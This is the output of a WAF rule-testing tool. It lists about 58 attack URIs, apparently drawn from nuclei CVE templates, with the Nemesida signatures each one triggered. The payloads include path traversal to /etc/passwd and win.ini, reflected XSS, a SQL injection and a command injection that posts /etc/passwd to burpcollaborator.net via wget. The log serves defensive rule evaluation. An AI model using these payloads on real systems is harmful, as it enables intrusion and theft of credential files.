# inspectorlog v3.5
#----- Initializing Rules (NEMESIDA)  ---------------------
#	Opening NEMESIDA rule file /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt...
#		Rules: read [506], erroneous [0], URI (URL|ARGS) [449]
#-----  Statistics (NEMESIDA) ------------------------------
# Read [506] nemesida rules, [449] http-related, [0] with errors
#----- Analysis results ----------------------------
# Alerts & signatures generated from: /home/kali/Downloads/inspectorlog/inspectorlog -l cve.uri -m /home/kali/Downloads/reglas_javi/nemesida/nemesida-rules-bin-20220109.txt -t list -o /home/kali/TFG/inspectorlog/nemesida/web_dinamica/owasp/opensource/nuclei/cve.clean
Packet [1]	Uri [/web/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [3]	Uri [/web/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [4]	Uri [/web/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [5]	Uri [/web/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001513]	[300001559]
Packet [6]	Uri [/web/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [7]	Uri [/web/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [8]	Uri [/web/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [11]	Uri [/web/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [12]	Uri [/web/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [13]	Uri [\..\..\..\..\Windows\win.ini]	Nattacks [3]	Signatures	[300000057]	[300000071]	[300001517]
Packet [14]	Uri [/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [15]	Uri [/web/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [16]	Uri [/web/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [19]	Uri [/web/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1]	Nattacks [9]	Signatures	[300000031]	[300000039]	[300000040]	[300000052]	[300000069]	[300001007]	[300001130]	[300001132]	[300002416]
Packet [21]	Uri [/web/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [22]	Uri [/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000033]	[300000057]	[300000067]	[300001145]	[300001559]
Packet [24]	Uri [/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [25]	Uri [/web/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd]	Nattacks [3]	Signatures	[300000057]	[300000067]	[300001559]
Packet [26]	Uri [/web/tests/support/stores/test_grid_filter.php?query=phpinfo();]	Nattacks [2]	Signatures	[300000051]	[300001871]
Packet [28]	Uri [/web/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001359]	[300001559]
Packet [30]	Uri [/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [32]	Uri [/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [33]	Uri [/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [34]	Uri [/web/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [35]	Uri [/web/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [37]	Uri [/web/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [38]	Uri [/web/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [39]	Uri [/web/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [41]	Uri [/web/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd]	Nattacks [5]	Signatures	[300000033]	[300000057]	[300000067]	[300001145]	[300001559]
Packet [45]	Uri [/web/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E]	Nattacks [3]	Signatures	[300000508]	[300000515]	[300000537]
Packet [46]	Uri [/web/search/members/?id`%3D520)%2f**%2funion%2f**%2fselect%2f**%2f1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2Cunhex%28%2770726f6a656374646973636f766572792e696f%27%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%23sqli=1]	Nattacks [9]	Signatures	[300000031]	[300000039]	[300000040]	[300000052]	[300000069]	[300001007]	[300001130]	[300001132]	[300002416]
Packet [47]	Uri [/web/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [49]	Uri [/web/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00]	Nattacks [5]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]	[300001559]
Packet [50]	Uri [/web/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/]	Nattacks [2]	Signatures	[300000057]	[300000071]
Packet [51]	Uri [/web/LetsEncrypt/Index?fileName=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [53]	Uri [/web/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001559]
Packet [54]	Uri [/web/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [57]	Uri [/web/ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [58]	Uri [/web/does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x]	Nattacks [5]	Signatures	[300000502]	[300000508]	[300000515]	[300000516]	[300000537]
Packet [60]	Uri [/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)]	Nattacks [4]	Signatures	[300000036]	[300000068]	[300001322]	[300001559]
Packet [62]	Uri [/web/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [64]	Uri [/web/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [65]	Uri [/web/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//]	Nattacks [3]	Signatures	[300000508]	[300000532]	[300000550]
Packet [66]	Uri [/web/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [67]	Uri [/web/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [69]	Uri [/web/LetsEncrypt/Index?fileName=/etc/passwd]	Nattacks [2]	Signatures	[300001559]	[300002734]
Packet [74]	Uri [/web/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [75]	Uri [/web/does_not_exist%22%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3Cimg%20src=x]	Nattacks [5]	Signatures	[300000502]	[300000508]	[300000515]	[300000516]	[300000537]
Packet [77]	Uri [/web/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [78]	Uri [/web/wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [80]	Uri [/web/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)]	Nattacks [4]	Signatures	[300000036]	[300000068]	[300001322]	[300001559]
Packet [81]	Uri [/web/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//]	Nattacks [3]	Signatures	[300000508]	[300000532]	[300000550]
Packet [83]	Uri [/web/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [84]	Uri [/web/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00]	Nattacks [4]	Signatures	[300000057]	[300000067]	[300001145]	[300001359]
Packet [91]	Uri [/web/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [4]	Signatures	[300000508]	[300000515]	[300000537]	[300000550]
Packet [95]	Uri [/web/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://]	Nattacks [1]	Signatures	[300001516]
Packet [96]	Uri [/web/lumis/portal/controller/xml/PageControllerXml.jsp]	Nattacks [1]	Signatures	[300001516]
Packet [97]	Uri [/web/carbon/generic/save_artifact_ajaxprocessor.jsp]	Nattacks [1]	Signatures	[300001516]
# N. packets [98], [58] with alerts, N. Alerts [225]
# Execution time: 0.049739 s
